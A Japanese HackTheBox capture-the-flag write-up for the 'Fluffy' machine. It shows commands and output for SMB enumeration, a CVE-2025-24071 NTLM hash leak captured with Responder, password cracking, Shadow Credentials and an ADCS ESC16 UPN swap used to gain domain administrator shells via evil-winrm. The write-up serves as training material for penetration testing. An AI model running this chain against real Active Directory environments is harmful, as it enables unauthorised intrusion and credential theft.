はじめに
本記事はHackTheBoxのWriteupです。
Machineは、Fluffyです。
Fluffyでは、列挙とActive Directory証明書サービスについて学びます。
スキャニング
はじめにポートスキャンを実行します。
以下では事前に用意したシェルを介してポートスキャンを実行しています。
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 22:17 JST
Nmap scan report for fluffy.htb (10.10.11.69)
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-17 20:17:47Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:20+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:19+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-17T20:19:20+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-06-17T20:19:19+00:00; +7h00m01s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49753/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2025-06-17T20:18:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.45 seconds
Scan completed
上記ポートスキャンの結果を基に調査を行います。
列挙
ポートスキャンの結果を踏まえてOSはWindowsであり、Active Directoryが動作していることが分かります。
以降Active Directoryにフォーカスして提供されているアカウントの資格情報を基に列挙を行います。
SMB
以下のコマンドを実行して、パブリックな共有フォルダを確認します。
$ smbclient -L //10.10.11.69 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
上記結果より興味深いフォルダを発見したので、smbmapを実行してフォルダの権限を確認します。※資格情報は事前に提供されているものを使用
$ smbmap -H 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.69:445 Name: fluffy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ, WRITE
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
ITフォルダに対する読み取り及び書き込み権限が確認できました。ITフォルダに対してアクセスを行います。
$ smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 18 05:20:42 2025
.. D 0 Wed Jun 18 05:20:42 2025
.library-ms A 0 Tue Jun 17 23:52:28 2025
CVE-2025-24071_PoCpoc.py A 0 Wed Jun 18 00:11:49 2025
Everything-1.4.1.1026.x64 D 0 Sat Apr 19 00:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Sat Apr 19 00:04:05 2025
KeePass-2.58 D 0 Sat Apr 19 00:08:38 2025
KeePass-2.58.zip A 3225346 Sat Apr 19 00:03:17 2025
poc.py A 1003 Wed Jun 18 00:11:55 2025
Upgrade_Notice.pdf A 169963 Sat May 17 23:31:07 2025
xd.library-ms N 365 Tue Jun 17 21:39:29 2025
5842943 blocks of size 4096. 1975342 blocks available
Upgrade_Notice.pdfファイルをダウンロードします。
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (88.6 KiloBytes/sec) (average 88.6 KiloBytes/sec)
Upgrade_Notice.pdfファイルを参照すると、影響度の高い脆弱性が複数公開されたため、すべての管理者は社内セキュリティポリシーに従い、すべてのシステムをアップグレードするよう記載されています。
脆弱性分析
ITフォルダに存在するPoCのファイルやフォルダに対する書き込み権限を踏まえて、CVE-2025-24071の脆弱性が存在すると推測できます。
CVE‑2025‑24071は、ZIP/RARアーカイブに含まれる.library-msファイルに悪意あるSMBパスを埋め込み、Windows Explorerがそのファイルを自動的に解析することで、ユーザーのNTLM認証情報がSMB経由で攻撃者管理下のサーバに送信される脆弱性です。
GitHubで見つけたPoCを利用します。
事前に用意したzip形式のファイルをアップロードし、responderを実行して監視します。
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.4 kb/s) (average 0.4 kb/s)
$ responder -I tun0 -wvF
しばらくすると、ハッシュ値が確認できます。
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:a18b542bd7fabf0a:AAEAE0FA95535E87401ACBAC0713B659:01010000000000008080D580D7DFDB010587CBAD341354350000000002000800480054005800330001001E00570049004E002D005700410058003100340037004300570033004F00390004003400570049004E002D005700410058003100340037004300570033004F0039002E0048005400580033002E004C004F00430041004C000300140048005400580033002E004C004F00430041004C000500140048005400580033002E004C004F00430041004C00070008008080D580D7DFDB0106000400020000000800300030000000000000000100000000200000FDCD929552F48C9CE7380DEED339659F99BD1AB885EE1355173CD7C50771944D0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100350035000000000000000000
ハッシュ値を控えて、johnコマンドでクラックすると、パスワードが取得できます。
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (p.agila)
1g 0:00:00:00 DONE (2025-06-17 22:35) 1.515g/s 6851Kp/s 6851Kc/s 6851KC/s proquis..prison only
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
システムハッキング
取得したp.agilaユーザーの認証情報を用いて、足場を作ります。
アクセスの獲得
はじめにbloodhound.pyツールを実行して、fluffy.htbドメインに関する全ての情報を収集します。
$ bloodhound-python -u 'p.agila' -p 'REDACTED' -d fluffy.htb -ns 10.10.11.69 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 48S
INFO: Compressing output into 20250617224035_bloodhound.zip
BloodHoundを起動して、収集したzipファイルをアップロードし、AD分析を行います。
Outbound Object Controlより、p.agilaユーザーのコントロール権限を確認します。p.agilaユーザーは間接的にService Accountsを完全に制御できるということが分かります。
また、Service Accountsグループは、LDAP_SVC、WINRM_SVC、CA_SVC、に対して書き込み権限を持っていることが確認できます。
WINRM_SVCは、REMOTE MANAGEMENT USERSグループに所属しているのが確認できます。
以下のコマンドを実行して、p.agilaユーザーをSERVICE ACCOUNTSグループに追加します。
$ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'REDACTED' add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS
次のShadow Credentials攻撃を実行する前に、時刻同期のずれによるエラーを回避するため、攻撃対象のMachineに対して時刻同期を行います。
$ sudo systemctl stop systemd-timesyncd
$ sudo ntpdate 10.10.11.69
2025-06-18 05:42:51.187948 (+0900) +25200.764221 +/- 0.127682 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25200.764221
以下のコマンドを実行して、Shadow Credentials攻撃を実行して、winrm_svcユーザーのNTハッシュを取得します。
$ certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -account 'WINRM_SVC'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'f6521ffe-f364-a648-f051-ee0fc8452cbe'
[*] Adding Key Credential with device ID 'f6521ffe-f364-a648-f051-ee0fc8452cbe' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'f6521ffe-f364-a648-f051-ee0fc8452cbe' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': [REDACTED]
以下のコマンドを実行して、WinRMのシェルを取得します。
$ evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '[REDACTED]'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
ユーザーフラグ
Desktopよりユーザーフラグが確認できます。
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\winrm_svc\desktop> ls
Directory: C:\Users\winrm_svc\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2025 4:01 AM 34 user.txt
ルートフラグ
ルートフラグは、Active Directory証明書サービスの脆弱性を攻略する必要があります。
以下のコマンドを実行して、ADCSの脆弱性をスキャンします。ca_svcユーザーのハッシュ値はwinrm_svcユーザー同様にcertipy-adコマンドで取得したものを利用します。
$ certipy-ad find -username ca_svc -hashes :[REDACTED] -dc-ip 10.10.11.69 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250618054924_Certipy.txt'
[*] Wrote text output to '20250618054924_Certipy.txt'
[*] Saving JSON output to '20250618054924_Certipy.json'
[*] Wrote JSON output to '20250618054924_Certipy.json'
上記コマンド実行後に生成されるtxtファイルより、ESC16の脆弱性が確認できます。
$ cat 20250618054924_Certipy.tx
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
以下のコマンドを実行して、ca_svcユーザーの情報を読み取ります。
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : ca_svc@fluffy.htb
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-06-17T15:17:16+00:00
以下のコマンドを実行して、一時的にca_svcユーザーのUPNをadministratorに更新します。
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
以下のコマンドを実行して、証明書にリンクされた資格情報を作成し、証明書による認証を可能にします。
$ certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -account 'ca_svc' auto
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233'
[*] Adding Key Credential with device ID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'dd5c1d04-3ee0-2c6c-ca62-1ec838dcf233' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': [REDACTED]
以下のコマンドを実行して、環境変数KRB5CCNAMEをエクスポートします。
$ export KRB5CCNAME=ca_svc.ccache
以下のコマンドを実行して、AD CSに証明書の発行を要求します。
$ certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
以下のコマンドを実行して、ca_svcユーザーのUPNを復元します。
$ certipy-ad account -u 'p.agila@fluffy.htb' -p 'REDACTED' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
以下のコマンドを実行して、administratorとして認証します。
$ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': [REDACTED]
以下のコマンドを実行して、WinRMのシェルを取得します。
$ evil-winrm -i 10.10.11.69 -u 'administrator' -H [REDACTED]
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Desktopよりルートフラグが確認できます。
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2025 4:01 AM 34 root.txt
おわりに
AD分析を行う際は、BloodHoundの操作方法についても理解しておくことが重要です。